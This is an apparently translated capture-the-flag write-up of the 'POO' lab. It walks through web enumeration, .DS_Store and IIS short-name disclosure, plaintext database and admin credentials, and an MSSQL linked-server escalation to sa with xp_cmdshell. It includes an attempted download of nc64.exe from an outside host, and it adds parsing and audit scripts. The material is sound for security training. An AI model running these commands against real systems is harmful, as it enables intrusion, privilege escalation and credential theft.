First, run an nmap scan.
└─$ sudo nmap -sS -sV -sC 10.13.38.11
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
|_ssl-date: 2022-06-21T01:44:22+00:00; +4s from scanner time.
| ms-sql-ntlm-info:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-19T02:28:12
|_Not valid after: 2052-06-19T02:28:12
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 10.13.38.11:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
The scan found two services: IIS on port 80 and SQL Server on port 1433, so there is a web service and a database service. Visiting the site first shows the default IIS page, with nothing of interest, so the next move is to look for other entry points by directory brute-forcing.
└─$ gobuster dir -u http://10.13.38.11 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -t 50
===============================================================
/plugins (Status: 301) [Size: 150] [--> http://10.13.38.11/plugins/]
/themes (Status: 301) [Size: 149] [--> http://10.13.38.11/themes/]
/images (Status: 301) [Size: 149] [--> http://10.13.38.11/images/]
/js (Status: 301) [Size: 145] [--> http://10.13.38.11/js/]
/templates (Status: 301) [Size: 152] [--> http://10.13.38.11/templates/]
/admin (Status: 401) [Size: 1293]
/uploads (Status: 301) [Size: 150] [--> http://10.13.38.11/uploads/]
/dev (Status: 301) [Size: 146] [--> http://10.13.38.11/dev/]
/. (Status: 200) [Size: 703]
/widgets (Status: 301) [Size: 150] [--> http://10.13.38.11/widgets/]
/meta-inf (Status: 301) [Size: 151] [--> http://10.13.38.11/meta-inf/]
/.ds_store (Status: 200) [Size: 10244]
/.trashes (Status: 301) [Size: 151] [--> http://10.13.38.11/.trashes/]
admin and uploads immediately look interesting, but admin requires authentication and uploads returns Access is denied, so those two directories are out. Every other one also gives Access is denied, except /.ds_store, which can be downloaded. Looking up sensitive files under a web root: .DS_Store is a file used mostly on Mac OS X; although this is a Windows host, the site was probably developed on macOS and then deployed to a Windows machine.
It is now clear this is a sensitive file, and fortunately it is easy to read; the binary structure is explained in detail in Parsing the .DS_Store file format.
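As an added example (my own code, not from the post or from any of the tools it mentions), here is a small Python extractor for the part of the format that matters to a defender: the file names a leaked .DS_Store reveals. It relies on the record layout described in the write-up linked above (a big-endian length, the name in UTF-16BE, a four-byte structure id and a four-byte type tag) and scans for that pattern rather than walking the buddy-allocator B-tree, so it also works on a truncated download. The sample bytes are constructed inline; the structure-id list is the one from the public format description.

```python
import re
import struct

# Structure ids and data-type tags that appear in .DS_Store records
# (from the public format description).  A record is laid out as:
#   uint32 name_length | name (UTF-16BE) | 4-byte structure id | 4-byte type | data
STRUCT_IDS = [
    b"Ilsz", b"bwsp", b"lsvp", b"lsvP", b"icvp", b"dilc", b"vSrn", b"fwi0",
    b"fwsw", b"fwvh", b"ptbL", b"ptbN", b"icgo", b"icsp", b"lssp", b"moDD",
    b"modD", b"pBB0", b"phyS", b"logS", b"cmmt", b"BKGD", b"ICVO", b"LSVO",
    b"GRP0", b"dscl", b"bRsV",
]
TYPE_TAGS = [b"long", b"shor", b"bool", b"blob", b"type", b"ustr", b"comp", b"dutc"]

_IDS = b"|".join(re.escape(s) for s in STRUCT_IDS)
_TAGS = b"|".join(TYPE_TAGS)
RECORD_TAIL = re.compile(b"(?:" + _IDS + b")(?:" + _TAGS + b")")


def extract_names(data, max_name_chars=255):
    """Return the sorted, de-duplicated file names stored in .DS_Store bytes.

    For every structure-id/type pair found, walk backwards over candidate
    name lengths until the 4-byte big-endian length field agrees with the
    distance to the pair; that position is the start of the record.
    """
    names = set()
    for match in RECORD_TAIL.finditer(data):
        end = match.start()
        for n in range(1, max_name_chars + 1):
            start = end - 2 * n - 4
            if start < 0:
                break
            if data[start:start + 4] == struct.pack(">I", n):
                try:
                    names.add(data[start + 4:end].decode("utf-16-be"))
                except UnicodeDecodeError:
                    pass
                break
    return sorted(names)


def _record(name, struct_id, type_tag, payload):
    """Build one record in the layout above (constructed test data, not a real file)."""
    encoded = name.encode("utf-16-be")
    return struct.pack(">I", len(name)) + encoded + struct_id + type_tag + payload


# Constructed sample: a 'Bud1' header fragment followed by three records, as
# Finder would write for a web root containing these entries.
SAMPLE = (
    b"\x00\x00\x00\x01Bud1" + b"\x00" * 32
    + _record("admin", b"Ilsz", b"blob", struct.pack(">I", 16) + b"\x00" * 16)
    + _record("New folder (2)", b"bwsp", b"blob", struct.pack(">I", 4) + b"\x00" * 4)
    + _record("web.config", b"moDD", b"dutc", b"\x00" * 8)
)

if __name__ == "__main__":
    for name in extract_names(SAMPLE):
        print(name)
```

Run against a real download the script prints every entry name Finder recorded, which is exactly the list the online tool produced further down; the same scan is a cheap pre-deployment check for a web root that was assembled on a Mac.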
At first I tried an online tool and couldn't make much of the result, then I found a few tools.
└─ python main.py /home/kali/Downloads/ds_store
Count: 38
admin
admin
admin
dev
dev
dev
iisstart.htm
Images
Images
Images
JS
JS
JS
META-INF
META-INF
META-INF
New folder
New folder
New folder
New folder (2)
New folder (2)
New folder (2)
Plugins
Plugins
Plugins
Templates
Templates
Templates
Themes
Themes
Themes
Uploads
Uploads
Uploads
web.config
Widgets
Widgets
Widgets
That still doesn't reveal much... Later I learned about this one:
└─$ python /opt/DS_Walk/ds_walk.py -u http://10.13.38.11/
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://10.13.38.11//admin
[!] http://10.13.38.11//dev
[!] http://10.13.38.11//iisstart.htm
[!] http://10.13.38.11//Images
[!] http://10.13.38.11//JS
[!] http://10.13.38.11//META-INF
[!] http://10.13.38.11//New folder
[!] http://10.13.38.11//New folder (2)
[!] http://10.13.38.11//Plugins
[!] http://10.13.38.11//Templates
[!] http://10.13.38.11//Themes
[!] http://10.13.38.11//Uploads
[!] http://10.13.38.11//web.config
[!] http://10.13.38.11//Widgets
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11//Images/buttons
[!] http://10.13.38.11//Images/icons
[!] http://10.13.38.11//Images/iisstart.png
----------------------------
[!] http://10.13.38.11//JS/custom
----------------------------
[!] http://10.13.38.11//Themes/default
----------------------------
[!] http://10.13.38.11//Widgets/CalendarEvents
[!] http://10.13.38.11//Widgets/Framework
[!] http://10.13.38.11//Widgets/Menu
[!] http://10.13.38.11//Widgets/Notifications
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts/custom
[!] http://10.13.38.11//Widgets/Framework/Layouts/default
----------------------------
[*] Finished traversing. No remaining .ds_store files present.
[*] Cleaning up .ds_store files saved to disk.
That is far more than gobuster gave us. Cracking the two hashes: md5(mrb3n)=304c0c90fbc6520610abbf378e2339d1 and md5(eks)=dca66d38fd916317687e1390a420c3fc. Of course, trying to enter these new directories also gives Access is denied, and they don't work as a username/password pair for the admin directory either. Perhaps they are SQL Server user names?
The only option is to look for more entry points. IIS has a short file name vulnerability; the most widely cited reference is Microsoft IIS tilde character "~" Vulnerability/Feature – Short File/Folder Name Disclosure, and the Chinese post IIS短文件名暴力猜解漏洞分析 explains it simply: for compatibility with 16-bit MS-DOS programs, Windows generates an 8.3 short file name for every file (and folder) whose name is too long for that format. We use the IIS_shortname_Scanner tool written by that post's author to enumerate. Through ds_walk we found the same four directories under both user hashes: core, db, include and src. Only db produced results when scanned, and both db directories appear to contain the same txt file.
└─$ python2 iis_shortname_Scan.py http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/db
Server is vulnerable, please wait, scanning...
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/p~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/po~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_c~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.t* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.tx* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [scan in progress]
[+] File //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*
----------------------------------------------------------------
└─$ python2 iis_shortname_Scan.py http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/db
----------------------------------------------------------------
File: //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt*
----------------------------------------------------------------
Obviously poo is the name of this lab, so the key is the 'co' that follows it: grep the words starting with co from the wordlist, then prepend poo_ and append .txt to each.
# Write the co... words to fuzz.txt
grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > fuzz.txt
vim fuzz.txt
# Run these commands inside vim
# Add poo_ at the start of every line
:%s/^/poo_
# Add .txt at the end of every line
:%s/$/.txt
# Enumerate the directory
└─$ gobuster dir -u http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db -w /home/kali/Desktop/fuzz.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
/poo_connection.txt (Status: 200) [Size: 142]
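To make the short-name step concrete, here is an added Python example (my own, not the scanner's code) that reproduces the basic 8.3 generation rule the post describes and then does what the grep/vim steps above do by hand, in the general form: keep only the candidates whose 8.3 form equals the observed short name. One thing the hand-built wordlist misses falls out of the rule: a name that already fits 8.3, such as poo_core.txt, gets no ~1 form at all, so the tilde tells you the real base name is at least nine characters. The collision scheme is simplified (Windows switches to a hash-based short name after a few ~N collisions, which is not modelled) and the wordlist fragment is constructed inline.

```python
# Characters Windows allows in an 8.3 name (letters, digits and a fixed set of symbols).
VALID_83 = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%&'()-@^_`{}~")


def is_83(name):
    """True if NAME already fits 8.3 (Windows then creates no separate short name)."""
    if name.count(".") > 1:
        return False
    base, _, ext = name.partition(".")
    return 1 <= len(base) <= 8 and len(ext) <= 3 and all(c in VALID_83 for c in base + ext)


def short_name(long_name, taken=()):
    """Return the 8.3 short name Windows would generate for LONG_NAME.

    Rules modelled (the ones the disclosure relies on): upper-case, drop
    spaces and all dots but the last, replace other illegal characters with
    '_', keep the first 6 characters of the base, append ~N, keep the first
    3 characters of the extension.  TAKEN holds short names already used in
    the directory, so 'New folder' and 'New folder (2)' get ~1 and ~2.
    The hashed form Windows uses after several collisions is not modelled.
    """
    upper = long_name.upper()
    if is_83(upper):
        return upper
    stripped = upper.replace(" ", "").strip(".")
    base, dot, ext = stripped.rpartition(".")
    if not dot:
        base, ext = stripped, ""
    base = "".join(c if c in VALID_83 else "_" for c in base.replace(".", ""))
    ext = "".join(c if c in VALID_83 else "_" for c in ext)[:3]
    n = 1
    while True:
        tilde = "~%d" % n
        candidate = base[:8 - len(tilde)] + tilde + ("." + ext if ext else "")
        if candidate not in taken:
            return candidate
        n += 1


def candidates(observed, words, prefix="", suffix=""):
    """Words W for which prefix+W+suffix would carry the observed 8.3 name.

    OBSERVED is what the scanner reports (e.g. 'poo_co~1.txt', any case).
    Each candidate is evaluated on its own, so only the ~1 form is compared.
    """
    observed = observed.upper()
    return [w for w in words if short_name(prefix + w + suffix) == observed]


# Constructed wordlist fragment standing in for the 'co' lines grep'd above.
WORDS = ["co", "code", "config", "connection", "cookies", "core", "admin"]

if __name__ == "__main__":
    print(short_name("poo_connection.txt"))  # POO_CO~1.TXT
    print(candidates("poo_co~1.txt", WORDS, prefix="poo_", suffix=".txt"))
```

On the defensive side the same rule shows what to switch off: 8.3 name creation can be disabled per volume with fsutil 8dot3name set (existing short names have to be removed separately with fsutil 8dot3name strip), and IIS request filtering can reject any URL containing "~" so the probe never reaches the file system.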
Finally. Let's see whether we can use it. Judging by the directory and file name it should be a database configuration file? Hopefully.
└─$ curl http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_connection.txt
SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#
Flag : POO{fcfb0****************5011ad555}
That gives us not only the database credentials but also this section's flag.
Argh: I tried connecting with mssqlclient.py and it refused to connect; eventually the walkthrough revealed that the two # characters around the password have to be included.
└─$ mssqlclient.py external_user:#p00Public3xt3rnalUs3r#@10.13.38.11
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL>
First check 1433 - Pentesting MSSQL - Microsoft SQL Server - HackTricks for privilege-escalation options.
Sure enough, after seeing that we are not sysadmin, I had no idea how to proceed.
SQL> SELECT is_srvrolemember('sysadmin');
-----------
0
Then, from the walkthrough, I learned that SQL Server has a database link feature. Linked databases can run SQL on each other, which is a perfectly normal feature, but misconfiguring it hands us privileges. First, see which users exist on this database server.
SQL> SELECT name FROM master..syslogins
name
-------------------
sa
external_user
SQL> SELECT name FROM master..syslogins WHERE sysadmin = '1';
name
---------------------------------------
sa
This instance has two logins: the administrator sa, and plain old me, external_user. Even a plain user should check which permissions are usable; the result is about as plain as it gets.
SQL> SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
entity_name permission_name
------------- --------------------
server CONNECT SQL
SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! is the earliest write-up I found on this, though I didn't find it very clear; it does make two points, however.
Are you using Linked Servers? They may be in serious danger! explains how a misconfiguration turns the link user into sysadmin, and MSSQL for Pentester: Abusing Linked Database explains how to exploit it with Metasploit and PowerUpSQL.
Check the current host:
SQL> select @@servername
--------------------------
COMPATIBILITY\POO_PUBLIC
Check for linked servers:
SQL> select srvname from sysservers;
srvname
------------------------------
COMPATIBILITY\POO_CONFIG
COMPATIBILITY\POO_PUBLIC
We are linked to another instance, COMPATIBILITY\POO_CONFIG. Let's send it some requests; the form used in the article gives an error:
SQL> select version from openquery("linkedserver", 'select @@version as version');
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 1: Could not find server 'linkedserver' in sys.servers. Verify that the correct server name was specified. If necessary, execute the stored procedure sp_addlinkedserver to add the server to sys.servers.
Luckily the walkthrough author had already solved this. Ask for the current server name; the result COMPATIBILITY\POO_CONFIG shows the request went through.
SQL> EXECUTE ('select @@servername;') at [COMPATIBILITY\POO_CONFIG];
------------------------------
COMPATIBILITY\POO_CONFIG
Check the current user on COMPATIBILITY\POO_CONFIG:
SQL> EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];
------------------------------
internal_user
Likewise, check which login on COMPATIBILITY\POO_CONFIG has sysadmin:
SQL> EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
name
----------------
sa
Still sa. Now have COMPATIBILITY\POO_CONFIG send a request back to COMPATIBILITY\POO_PUBLIC:
SQL> EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
------------------------------
sa
Something remarkable happens: we have become sa. The link between the two instances is misconfigured, and that escalates our privileges. Checking permissions again, we now have all of them:
SQL> EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
entity_name permission_name
------------------------------ ------------------------------
server CONNECT SQL
server SHUTDOWN
server CREATE ENDPOINT
server CREATE ANY DATABASE
server CREATE AVAILABILITY GROUP
server ALTER ANY LOGIN
server ALTER ANY CREDENTIAL
server ALTER ANY ENDPOINT
server ALTER ANY LINKED SERVER
server ALTER ANY CONNECTION
server ALTER ANY DATABASE
server ALTER RESOURCES
server ALTER SETTINGS
server ALTER TRACE
server ALTER ANY AVAILABILITY GROUP
server ADMINISTER BULK OPERATIONS
server AUTHENTICATE SERVER
server EXTERNAL ACCESS ASSEMBLY
server VIEW ANY DATABASE
server VIEW ANY DEFINITION
server VIEW SERVER STATE
server CREATE DDL EVENT NOTIFICATION
server CREATE TRACE EVENT NOTIFICATION
server ALTER ANY EVENT NOTIFICATION
server ALTER SERVER STATE
server UNSAFE ASSEMBLY
server ALTER ANY SERVER AUDIT
server CREATE SERVER ROLE
server ALTER ANY SERVER ROLE
server ALTER ANY EVENT SESSION
server CONNECT ANY DATABASE
server IMPERSONATE ANY LOGIN
server SELECT ALL USER SECURABLES
server CONTROL SERVER
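The misconfiguration the post just exploited is easy to audit from the catalog views once the links are drawn as a graph. The following Python is an added example (not the post's code and not PowerUpSQL): it takes a snapshot of each instance's linked-server login mappings and sysadmin list, as the two T-SQL queries in the constants would export them, and searches for a chain of hops that turns a low-privileged login into a sysadmin one. The topology is constructed from the values the post observed (POO_PUBLIC linking to POO_CONFIG as internal_user, POO_CONFIG linking back as sa); the SELF marker stands for a mapping with uses_self_credential = 1, and the queries themselves are not executed by the script.

```python
from collections import deque

# T-SQL a DBA runs on each instance to export the inputs for the check below.
# Both use real catalog views; they are not executed by this script.
LINK_EXPORT_SQL = """
SELECT s.name AS linked_server, l.remote_name, l.uses_self_credential
FROM sys.servers AS s
JOIN sys.linked_logins AS l ON l.server_id = s.server_id
WHERE s.is_linked = 1;
"""
SYSADMIN_EXPORT_SQL = """
SELECT name FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;
"""

SELF = None  # remote_name when uses_self_credential = 1: the caller's own login passes through

# Constructed snapshot modelled on the lab: each instance lists its sysadmin
# logins and, per linked server, the remote login the link authenticates as.
TOPOLOGY = {
    "POO_PUBLIC": {"sysadmins": {"sa"}, "links": {"POO_CONFIG": "internal_user"}},
    "POO_CONFIG": {"sysadmins": {"sa"}, "links": {"POO_PUBLIC": "sa"}},
}


def escalation_paths(topology, start_server, start_login):
    """Breadth-first search over (server, login) states.

    Each link is an edge: executing at the linked server changes the
    effective login to the mapped remote login (or keeps it, for SELF).
    Returns every path that ends on a sysadmin login after at least one hop.
    """
    start = (start_server, start_login)
    seen = {start}
    queue = deque([(start, [start])])
    findings = []
    while queue:
        (server, login), path = queue.popleft()
        if len(path) > 1 and login in topology[server]["sysadmins"]:
            findings.append(path)
        for target, remote in topology[server].get("links", {}).items():
            state = (target, login if remote is SELF else remote)
            if state not in seen:
                seen.add(state)
                queue.append((state, path + [state]))
    return findings


def describe(path):
    """Render a path as 'SERVER(login) -> SERVER(login) -> ...'."""
    return " -> ".join("%s(%s)" % hop for hop in path)


def main():
    for path in escalation_paths(TOPOLOGY, "POO_PUBLIC", "external_user"):
        print("FINDING:", describe(path))


if __name__ == "__main__":
    main()
```

The fix the finding points at is the mapping on the return link: a linked login should map to a remote login with no more rights than the caller (or pass the caller's own credential through), never to sa, and the check returns nothing once that mapping is changed.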
Then all we need is to create a login with sysadmin privileges:
SQL> EXECUTE('EXECUTE(''CREATE LOGIN df WITH PASSWORD = ''''qwe123QWE!@#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
SQL> EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''df'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
If the login fails, wait a little; it takes a moment to take effect.
└─$ mssqlclient.py 'df:qwe123QWE!@#@10.13.38.11'
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
# List the databases
SQL> SELECT name FROM master..sysdatabases;
name
------------------------------
master
tempdb
model
msdb
POO_PUBLIC
flag
# Look at the flag database
SQL> select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;
table_name table_schema
------------------------------ ------------------------------
flag dbo
# Query the flag table
SQL> select * from flag.dbo.flag;
flag
----------------------------------------
b'POO{88d829eb************************}'
Now that we are sysadmin, I thought of doing what STARTING POINT TIER 2 Archetype did: use xp_cmdshell to run PowerShell and upload nc64.exe.
# Check the current user
SQL> xp_cmdshell "powershell -c whoami"
output
----------------------------------
nt service\mssql$poo_public
# Change to the current directory and upload the file
SQL> xp_cmdshell "powershell -c cd C:\Users\MSSQL`$POO_PUBLIC\Downloads; wget http://10.10.17.21/nc64.exe -outfile nc64.exe"
output
-----------------------------------------------------
wget : Unable to connect to the remote server
# No outbound connectivity, so that was wasted effort
SQL> xp_cmdshell "powershell -c ping 10.10.17.21"
output
----------------------------------------------------------
Pinging 10.10.17.21 with 32 bytes of data:
Ping statistics for 10.10.17.21:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss)
Still, this taught me PowerShell's escape character: in PowerShell $ introduces a variable, so the $POO_PUBLIC in the user name MSSQL$POO_PUBLIC would be treated as a variable, and the backtick ` escapes the $.
Next time, test connectivity before uploading a file, otherwise it's wasted effort.
For now, the only option is to look at the file system.
SQL> xp_cmdshell "powershell cd C://; ls"
output
------------------------------------------------------------------------
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/13/2019 3:58 AM inetpub
d----- 9/15/2018 10:19 AM PerfLogs
d-r--- 12/12/2019 7:35 PM Program Files
d----- 12/13/2019 4:01 AM Program Files (x86)
d-r--- 12/12/2019 6:02 PM Users
d----- 11/25/2021 9:36 PM Windows
-a---- 6/19/2022 12:35 PM 165593 PowerView.ps1
inetpub is the IIS web root; web.config is in there, but the current account has no permission to read it.
SQL> xp_cmdshell "powershell type C:\inetpub\wwwroot\web.config;"
------------------------------------------------------------------------
type : Access to the path 'C:\inetpub\wwwroot\web.config' is denied.
SQL Server supports external script extensions, and these scripts can be configured to run as another user: the SQL Server Launchpad service starts them under separate low-privileged worker accounts rather than the database engine's own service account.
How to run Python scripts in SQL Server 2017: SQL Server 2017 - Python Executing Inside SQL Server.
SQL> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
compatibility\poo_public01
We are now running as the poo_public01 user, and that user can read web.config:
SQL> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("type C:\inetpub\wwwroot\web.config");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<staticContent>
<mimeMap
fileExtension=".DS_Store"
mimeType="application/octet-stream"
/>
</staticContent>
<!--
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user
name="Administrator"
password="EverybodyWantsToWorkAtP.O.O."
/>
</credentials>
</forms>
</authentication>
-->
</system.webServer>
</configuration>
With these credentials, go to http://10.13.38.11/admin/ and log in.
The previous part gave us the IIS server credentials, so the idea now is to find a remote-management service. Since we have database administrator privileges, just list the listening ports, and check the IP address as well.
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("netstat -ano");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 916
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 4684
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:41433 0.0.0.0:0 LISTENING 4692
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 492
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1168
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1672
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
UDP [::]:123 *:* 760
UDP [::]:500 *:* 2560
UDP [::]:1434 *:* 2792
UDP [::]:3702 *:* 2464
UDP [::]:3702 *:* 2464
UDP [::]:4500 *:* 2560
UDP [::]:5353 *:* 1080
UDP [::]:5355 *:* 1080
UDP [::]:59578 *:* 2464
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("ipconfig");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Windows IP Configuration
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.20.128.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::250
IPv6 Address. . . . . . . . . . . : dead:beef::1001
IPv6 Address. . . . . . . . . . . : dead:beef::6033:f520:ab97:3e4
Link-local IPv6 Address . . . . . : fe80::6033:f520:ab97:3e4%5
IPv4 Address. . . . . . . . . . . : 10.13.38.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : dead:beef::1
fe80::250:56ff:feb9:1f8d%5
10.13.38.2
The walkthrough pointed out that an IPv6 scan is also needed before the remote-management service shows up. It reminded me of a previous case where the remote service ran over UDP rather than TCP and only a UDP scan revealed it.
Oddly, ipconfig shows three IPv6 addresses, so I simply scanned them all, and did a UDP scan as well.
The results all differed, so stay sceptical of scan results: when you seem out of options, question the scan and think about what other ways you could scan.
└─$ sudo nmap -sS -p 80,135,445,1433,5357,5985,41433,47001,49664,49665,49666 -6 dead:beef::250 --min-rate 10000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 04:15 EDT
Nmap scan report for dead:beef::250
Host is up (0.51s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp filtered msrpc
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
5357/tcp filtered wsdapi
5985/tcp filtered wsman
41433/tcp filtered unknown
47001/tcp filtered winrm
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
└─$ sudo nmap -sS -p 80,135,445,1433,5357,5985,41433,47001,49664,49665,49666 -6 dead:beef::1001 --min-rate 10000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 04:17 EDT
Nmap scan report for dead:beef::1001
Host is up (0.38s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp filtered msrpc
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
5357/tcp filtered wsdapi
5985/tcp open wsman
41433/tcp filtered unknown
47001/tcp filtered winrm
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
On dead:beef::1001 port 5985 is open, while on dead:beef::250 it is filtered.
evil-winrm can connect, but it doesn't seem to accept an IPv6 address directly, so add a line 'dead:beef::1001 hostname' to /etc/hosts.
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("hostname");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
COMPATIBILITY
# Add 'dead:beef::1001 COMPATIBILITY' to /etc/hosts
└─$ evil-winrm -i compatibility -u administrator -p 'EverybodyWantsToWorkAtP.O.O.'
